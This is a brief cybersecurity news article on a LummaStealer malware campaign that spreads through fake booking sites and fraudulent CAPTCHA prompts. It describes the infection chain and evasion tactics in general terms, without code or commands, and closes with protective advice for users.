Cybersecurity researchers at G DATA have discovered a new malware campaign using fake booking websites to spread LummaStealer malware via fake CAPTCHA prompts. This shift in distribution, found in January 2025, moves the malware away from platforms like GitHub and Telegram to malvertising methods.
The infection starts when users visit a fake payment confirmation page, which redirects them to a counterfeit booking site with a fraudulent CAPTCHA verification.
LummaStealer
The attack uses a multi-stage process to avoid detection. An encrypted PHP script injects a Base64-encoded PowerShell command into the user’s clipboard.
When run, the command triggers actions that download and execute the LummaStealer payload. This version of LummaStealer is much larger, growing up to 350% in size due to binary padding, which adds unnecessary data to the file.
This method bypasses file size limits in security tools, slowing analysis and reducing the effectiveness of signature-based antivirus detection.
Expanding Scope and Advanced Evasion Techniques
The campaign has a global reach, affecting countries like the Philippines and Germany. Over time, the attack’s geographic focus shifted, suggesting a broader targeting strategy. LummaStealer continues using advanced obfuscation techniques like Indirect Control Flow and Dispatcher Blocks, making it harder for researchers to track the malware’s execution.
With new distribution tactics and refined evasion methods, cybersecurity experts predict LummaStealer will remain a significant threat. The threat actors behind it are quick to adapt, using techniques like ClickFix to increase their success rate.
Users should be cautious when interacting with booking sites and watch out for unusual CAPTCHA requests that ask for system-level actions. Keeping security software updated and practicing good digital hygiene is essential for protection against these evolving threats.
Leave A Comment